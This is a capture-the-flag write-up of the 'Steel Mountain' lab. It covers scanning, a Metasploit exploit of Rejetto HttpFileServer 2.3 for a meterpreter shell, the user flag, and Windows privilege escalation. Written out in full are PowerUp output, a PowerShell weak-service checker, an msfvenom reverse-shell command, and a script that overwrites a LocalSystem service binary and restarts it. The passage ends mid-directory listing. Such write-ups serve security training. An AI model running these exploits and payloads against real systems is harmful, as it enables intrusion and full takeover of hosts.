Steel Mountain
Preface
bilibili:Zacarx
www.zacarx.com
Information gathering
nmap -p- -A IP
80,8080
# Full TCP port scan: 80 and 8080 are open; the service on 8080 identifies itself as HttpFileServer 2.3 (Rejetto HFS)
┌──(zacarx㉿zacarx)-[~]
└─$ dirb http://10.10.120.68/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Oct 26 14:07:07 2022
URL_BASE: http://10.10.120.68/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.120.68/ ----
==> DIRECTORY: http://10.10.120.68/img/
+ http://10.10.120.68/index.html (CODE:200|SIZE:772)
---- Entering directory: http://10.10.120.68/img/ ----
...
┌──(zacarx㉿zacarx)-[~]
└─$ searchsploit HttpFileServer 2.3
------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
...
┌──(zacarx㉿zacarx)-[~]
└─$ searchsploit -p 49125
Exploit: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
URL: https://www.exploit-db.com/exploits/49125
Path: /usr/share/exploitdb/exploits/windows/webapps/49125.py
File Type: Python script, Unicode text, UTF-8 text executable
.......
Exploitation
msf6 > search HttpFileServer 2.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.107 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.120.68
rhosts => 10.10.120.68
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > set Lhost 10.17.0.91
Lhost => 10.17.0.91
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.17.0.91:4444
[*] Using URL: http://10.17.0.91:8080/rO38EVW
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /rO38EVW
[*] Sending stage (175686 bytes) to 10.10.120.68
sessions 1
^C[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\YcIgpZ.vbs' on the target
[*] Exploit completed, but no session was created.
# The handler was interrupted with ^C before it printed the session banner, so the last line is misleading: session 1 does exist, as the next command shows. The cleanup warning is worth acting on, too: the module drops a .vbs file in %TEMP% on the target, which should be removed when the engagement is cleaned up.
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : STEELMOUNTAIN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: STEELMOUNTAIN\bill
meterpreter > cd C:\\
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-09-26 22:11:25 +0800 $Recycle.Bin
100666/rw-rw-rw- 1 fil 2013-06-18 20:18:29 +0800 BOOTNXT
040777/rwxrwxrwx 0 dir 2013-08-22 22:48:41 +0800 Documents and Settings
100666/rw-rw-rw- 3162859 fil 2020-10-13 03:06:12 +0800 EC2-Windows-Launch.zip
040777/rwxrwxrwx 0 dir 2013-08-22 23:52:33 +0800 PerfLogs
040555/r-xr-xr-x 4096 dir 2019-09-30 08:42:46 +0800 Program Files
040777/rwxrwxrwx 4096 dir 2019-09-30 08:46:20 +0800 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2019-09-30 08:47:36 +0800 ProgramData
040777/rwxrwxrwx 0 dir 2019-09-26 22:04:30 +0800 System Volume Information
040555/r-xr-xr-x 4096 dir 2019-09-27 14:29:03 +0800 Users
040777/rwxrwxrwx 24576 dir 2020-10-13 03:09:13 +0800 Windows
100444/r--r--r-- 398356 fil 2014-03-22 02:49:49 +0800 bootmgr
040777/rwxrwxrwx 0 dir 2019-09-26 22:17:28 +0800 inetpub
100666/rw-rw-rw- 13182 fil 2020-10-13 03:06:12 +0800 install.ps1
000000/--------- 0 fif 1970-01-01 08:00:00 +0800 pagefile.sys
meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2019-09-26 22:11:25 +0800 Administrator
040777/rwxrwxrwx 0 dir 2013-08-22 22:48:41 +0800 All Users
040555/r-xr-xr-x 8192 dir 2014-03-22 03:18:16 +0800 Default
040777/rwxrwxrwx 0 dir 2013-08-22 22:48:41 +0800 Default User
040555/r-xr-xr-x 4096 dir 2013-08-22 23:39:32 +0800 Public
040777/rwxrwxrwx 8192 dir 2019-09-28 00:09:05 +0800 bill
100666/rw-rw-rw- 174 fil 2013-08-22 23:37:57 +0800 desktop.ini
meterpreter > cd ./bill
meterpreter > ls
Listing: C:\Users\bill
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:24 +0800 .groovy
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 AppData
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Application Data
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Contacts
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Cookies
040555/r-xr-xr-x 0 dir 2019-09-28 00:08:24 +0800 Desktop
040555/r-xr-xr-x 4096 dir 2019-09-27 19:07:07 +0800 Documents
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Downloads
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Favorites
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Links
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Local Settings
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Music
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 My Documents
100666/rw-rw-rw- 524288 fil 2020-10-13 03:12:47 +0800 NTUSER.DAT
100666/rw-rw-rw- 1048576 fil 2019-09-28 00:09:04 +0800 NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.0.regtrans-ms
100666/rw-rw-rw- 1048576 fil 2019-09-28 00:09:05 +0800 NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.1.regtrans-ms
100666/rw-rw-rw- 1048576 fil 2019-09-28 00:09:05 +0800 NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.2.regtrans-ms
100666/rw-rw-rw- 65536 fil 2019-09-28 00:09:04 +0800 NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.blf
100666/rw-rw-rw- 65536 fil 2019-09-27 14:29:12 +0800 NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-09-27 14:29:12 +0800 NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-09-27 14:29:12 +0800 NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 NetHood
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Pictures
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 PrintHood
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Recent
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Saved Games
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Searches
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 SendTo
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Start Menu
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Templates
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Videos
100666/rw-rw-rw- 483328 fil 2019-09-27 14:29:03 +0800 ntuser.dat.LOG1
100666/rw-rw-rw- 77824 fil 2019-09-27 14:29:03 +0800 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2019-09-27 14:29:03 +0800 ntuser.ini
meterpreter > cd C:\\Users\\bill\\Desktop
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-09-27 19:07:07 +0800 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 20:42:38 +0800 user.txt
meterpreter > cat user.txt
b04763b6fcf51fcd7c13abc7db4fd365
# user.txt is 70 bytes: a UTF-16 byte-order mark (rendered as �� by the terminal) plus the 32-character flag and a CRLF; the two leading characters are not part of the flag.
Privilege escalation
Download PowerUp.ps1 from https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
and upload it to the target (meterpreter's upload command places it in the current working directory).
In meterpreter, load the PowerShell extension with load powershell, then type powershell_shell and press Enter to get a PS > prompt.
Then dot-source PowerUp.ps1 and run every check:
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe; IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AWSLiteAgent
Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart : False
Name : AWSLiteAgent
Check : Unquoted Service Paths
ServiceName : AWSLiteAgent
Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart : False
Name : AWSLiteAgent
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe; IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe; IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart : True
Name : AdvancedSystemCareService9
Check : Modifiable Service Files
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFile : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'IObitUnSvr'
CanRestart : False
Name : IObitUnSvr
Check : Modifiable Service Files
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFile : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'LiveUpdateSvc'
CanRestart : False
Name : LiveUpdateSvc
Check : Modifiable Service Files
Of the services PowerUp flagged, AdvancedSystemCareService9 is the only one bill can also stop and start (CanRestart : True). The other hits are writable as well, but with CanRestart : False a replaced binary would only run at the next reboot. The entry that matters:
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart : True
Name : AdvancedSystemCareService9
Check : Modifiable Service Files
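To make the PowerUp output above less of a black box, here is a small re-implementation of the two checks that fired on this host (Unquoted Service Paths and Modifiable Service Files) together with the CanRestart test that decides which hit is usable right now. This is an added example written for this page; it is not from the original writeup and not PowerUp's own code, and the function names are mine. It assumes Windows PowerShell 3 or later and sc.exe, both present on Windows Server 2012 R2, and is meant to be run from the powershell_shell as the low-privileged user.

```powershell
# Rights that let a user replace or add content: WriteData/AppendData, Delete,
# WriteDACL, WriteOwner, plus the GENERIC_WRITE/GENERIC_ALL bits that appear in
# raw ACEs as 0x40000000/0x10000000 rather than as named FileSystemRights.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership') -bor 0x10000000 -bor 0x40000000

function Get-CurrentUserSids {
    # Every SID in the current token: the user itself plus all group memberships.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # "C:\a b\svc.exe" -x  ->  C:\a b\svc.exe     C:\a b\svc.exe -x  ->  C:\a b\svc.exe
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Get-HijackCandidates {
    param([string]$Binary)
    # For an unquoted path with spaces, CreateProcess tries every prefix that ends
    # at a space, with ".exe" appended, before the real image. For this box:
    # C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\IObit\Advanced.exe
    $idx = $Binary.IndexOf(' ')
    while ($idx -gt 0) {
        $Binary.Substring(0, $idx) + '.exe'
        $idx = $Binary.IndexOf(' ', $idx + 1)
    }
}

function Test-UserCanWrite {
    param([string]$Path)
    # $true if an Allow ACE that applies to $Path itself grants one of the
    # current user's SIDs a right in $WriteMask.
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }                       # no READ_CONTROL on the object
    $mine = Get-CurrentUserSids
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (([int]$ace.PropagationFlags -band 2) -ne 0) { continue }   # InheritOnly: not for this object
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                                              # orphaned SID, cannot be us
        if ($mine -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Test-CanRestartService {
    param([string]$Name)
    # Read the service DACL as SDDL. In service SDDL RP = SERVICE_START and
    # WP = SERVICE_STOP; GA and GX imply both. Only Allow ACEs are inspected.
    $sddl  = (& sc.exe sdshow $Name 2>$null) -join ''
    $alias = @{ AU = 'S-1-5-11'; BU = 'S-1-5-32-545'; WD = 'S-1-1-0'; IU = 'S-1-5-4'; BA = 'S-1-5-32-544' }
    $mine  = Get-CurrentUserSids
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);[^;]*;[^;]*;([^)]*)\)')) {
        $rights = $m.Groups[1].Value
        $who    = $m.Groups[2].Value
        if ($alias.ContainsKey($who)) { $who = $alias[$who] }
        if ($mine -notcontains $who) { continue }
        if ($rights -match 'GA|GX' -or ($rights -match 'RP' -and $rights -match 'WP')) { return $true }
    }
    return $false
}

function Find-WeakServices {
    # LocalSystem services whose binary the current user can overwrite, or whose
    # unquoted path lets the user plant a file that CreateProcess tries first.
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
        ForEach-Object {
            $bin    = Get-ServiceBinaryPath $_.PathName
            $hijack = @()
            if ($_.PathName -notmatch '^"' -and $bin -match ' ') {
                $hijack = @(Get-HijackCandidates $bin | Where-Object { Test-UserCanWrite (Split-Path -Parent $_) })
            }
            [pscustomobject]@{
                Name           = $_.Name
                Binary         = $bin
                BinaryWritable = Test-UserCanWrite $bin
                HijackPaths    = $hijack
                CanRestart     = Test-CanRestartService $_.Name
            }
        } |
        Where-Object { $_.BinaryWritable -or $_.HijackPaths.Count -gt 0 }
}

Find-WeakServices | Format-List
```

On this host the output should line up with PowerUp's: BUILTIN\Users can create files in C:\, so C:\Program.exe is a hijack path for every unquoted service, and STEELMOUNTAIN\bill can overwrite the three IObit binaries. Only the service whose DACL grants bill RP and WP (SERVICE_START and SERVICE_STOP) comes back with CanRestart set, which is what makes it the one worth attacking without waiting for a reboot.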
PowerUp shows three things about AdvancedSystemCareService9 that together give us SYSTEM: it runs as LocalSystem, bill can write its binary (Modifiable Service Files), and bill can stop and start it (CanRestart : True). So we can upload a reverse-shell executable, overwrite ASCService.exe with it, and restart the service to get a shell as NT AUTHORITY\SYSTEM (the Windows equivalent of root).
Steps:
First generate the payload on the attacker. windows/shell_reverse_tcp is a 32-bit payload, which matches the 32-bit Advanced SystemCare install under Program Files (x86). -f exe-service wraps it as a real Windows service binary that registers with the Service Control Manager; with a plain -f exe the SCM reports error 1053 (the service did not respond in time) when it is started:
msfvenom -p windows/shell_reverse_tcp LHOST=10.17.0.91 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
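The swap itself, once Advanced.exe has been uploaded into the service directory (the meterpreter steps that follow do exactly that by hand), as an added example that is not part of the original writeup. It is typed into the meterpreter powershell_shell as bill, assumes a listener such as nc -lvnp 4443 is already waiting on the attacker (matching LPORT above), and uses the service name, directory and file names from the PowerUp output. Because bill can also write to C:\Program Files (x86)\IObit (PowerUp's first finding), a file named Advanced.exe dropped there would be picked up through the unquoted path without touching ASCService.exe at all; this block follows the writeup and overwrites ASCService.exe instead, keeping a copy so the box can be restored.

```powershell
$svc     = 'AdvancedSystemCareService9'
$dir     = 'C:\Program Files (x86)\IObit\Advanced SystemCare'
$bin     = Join-Path $dir 'ASCService.exe'
$payload = Join-Path $dir 'Advanced.exe'            # uploaded with meterpreter 'upload'
$backup  = Join-Path $dir 'ASCService.exe.orig'     # name chosen for this example

# Sanity checks before touching anything: the service must run as LocalSystem
# and the payload must be in place, otherwise the swap buys nothing.
$cfg = Get-CimInstance Win32_Service -Filter "Name='$svc'"
if ($cfg.StartName -ne 'LocalSystem') { throw "$svc does not run as LocalSystem" }
if (-not (Test-Path -LiteralPath $payload)) { throw "payload not found: $payload" }

# 1. Stop the service. CanRestart : True in the PowerUp output means bill holds
#    SERVICE_STOP and SERVICE_START on the service object. Stop-Service blocks
#    until the SCM reports Stopped, so the binary is no longer locked.
Stop-Service -Name $svc -ErrorAction Stop

# 2. Keep a copy of the real binary, then overwrite it in place. Overwriting
#    (rather than delete + rename) only needs WriteData on the file, which is
#    the permission PowerUp reported for STEELMOUNTAIN\bill.
Copy-Item -LiteralPath $bin -Destination $backup -Force
Copy-Item -LiteralPath $payload -Destination $bin -Force

# 3. Start the service: the SCM launches ASCService.exe as LocalSystem, which is
#    now the exe-service payload, so the reverse shell arrives at the nc listener
#    as NT AUTHORITY\SYSTEM (confirm with whoami there).
Start-Service -Name $svc

# 4. Afterwards, restore the original so the host is left as it was found. The
#    payload process is the service itself, so stopping it also ends the shell.
# Stop-Service -Name $svc
# Copy-Item -LiteralPath $backup -Destination $bin -Force
# Start-Service -Name $svc
```

Because the payload was built with -f exe-service, Start-Service returns cleanly; if it instead fails with error 1053, the uploaded file is a plain executable and needs to be regenerated as shown above.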
Then go to the directory that holds the service binary:
meterpreter > cd Program\ Files\ (x86)
meterpreter > ls
Listing: C:\Program Files (x86)
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:46 +0800 Common Files
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:48 +0800 IObit
040777/rwxrwxrwx 4096 dir 2014-03-22 03:08:30 +0800 Internet Explorer
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:30 +0800 Microsoft.NET
040777/rwxrwxrwx 0 dir 2019-09-30 08:46:20 +0800 Uninstall Information
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:33 +0800 Windows Mail
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:30 +0800 Windows NT
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:30 +0800 WindowsPowerShell
100666/rw-rw-rw- 174 fil 2013-08-22 23:37:57 +0800 desktop.ini
meterpreter > cd IObit
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 32768 dir 2022-10-26 14:03:29 +0800 Advanced SystemCare
040777/rwxrwxrwx 16384 dir 2019-09-27 13:35:24 +0800 IObit Uninstaller
040777/rwxrwxrwx 4096 dir 2019-09-26 23:18:50 +0800 LiveUpdate
meterpreter > cd Advanced\ SystemCare
meterpreter > ls
Listing: C:\Program Files (x86)\IObit\Advanced SystemCare
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 5091616 fil 2016-08-17 02:03:56 +0800 ASC.exe
100777/rwxrwxrwx 691488 fil 2015-12-29 04:48:34 +0800 ASCDownload.exe
100666/rw-rw-rw- 166176 fil 2015-12-29 04:47:32 +0800 ASCExtMenu.dll
100666/rw-rw-rw- 187680 fil 2015-12-29 04:47:30 +0800 ASCExtMenu_64.dll
100777/rwxrwxrwx 574240 fil 2016-03-04 08:16:34 +0800 ASCInit.exe
100666/rw-rw-rw- 743 fil 2019-09-26 23:17:50 +0800 ASCInit.log
100777/rwxrwxrwx 452384 fil 2016-07-26 01:01:08 +0800 ASCService.exe
100666/rw-rw-rw- 104270 fil 2022-10-26 15:12:56 +0800 ASCService.log
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:49 +0800 ASCServiceLog
100777/rwxrwxrwx 2023712 fil 2016-07-28 02:24:22 +0800 ASCTray.exe
100777/rwxrwxrwx 555808 fil 2015-12-29 05:06:42 +0800 ASCUpgrade.exe
100777/rwxrwxrwx 2400528 fil 2019-09-26 23:18:22 +0800 ASCVER.exe
100777/rwxrwxrwx 599328 fil 2015-12-29 04:48:46 +0800 AUpdate.exe
100666/rw-rw-rw- 64800 fil 2015-12-29 04:48:24 +0800 About.dll
100777/rwxrwxrwx 310560 fil 2016-07-28 02:24:20 +0800 About.exe
100666/rw-rw-rw- 21506 fil 2019-09-26 23:18:14 +0800 ActionCenter2.log
100777/rwxrwxrwx 2254624 fil 2016-01-08 09:13:48 +0800 ActionCenterDownloader.exe
100777/rwxrwxrwx 1917728 fil 2016-04-30 02:12:38 +0800 AutoCare.exe
100777/rwxrwxrwx 191264 fil 2015-12-29 04:52:24 +0800 AutoReactivator.exe
100777/rwxrwxrwx 1194784 fil 2016-04-30 02:12:40 +0800 AutoSweep.exe
100777/rwxrwxrwx 1403680 fil 2016-07-21 00:15:38 +0800 AutoUpdate.exe
100666/rw-rw-rw- 18536 fil 2019-09-27 16:32:33 +0800 AutoUpdate.log
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:46 +0800 Backup
100777/rwxrwxrwx 1063200 fil 2016-03-08 02:14:22 +0800 BrowserCleaner.exe
100666/rw-rw-rw- 131872 fil 2016-07-21 00:15:42 +0800 CPUIDInterface.dll
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:42 +0800 Config
100777/rwxrwxrwx 451872 fil 2015-12-29 04:49:22 +0800 DNSProtect.exe
100777/rwxrwxrwx 513528 fil 2016-04-13 04:10:24 +0800 Dashlane_Launcher.exe
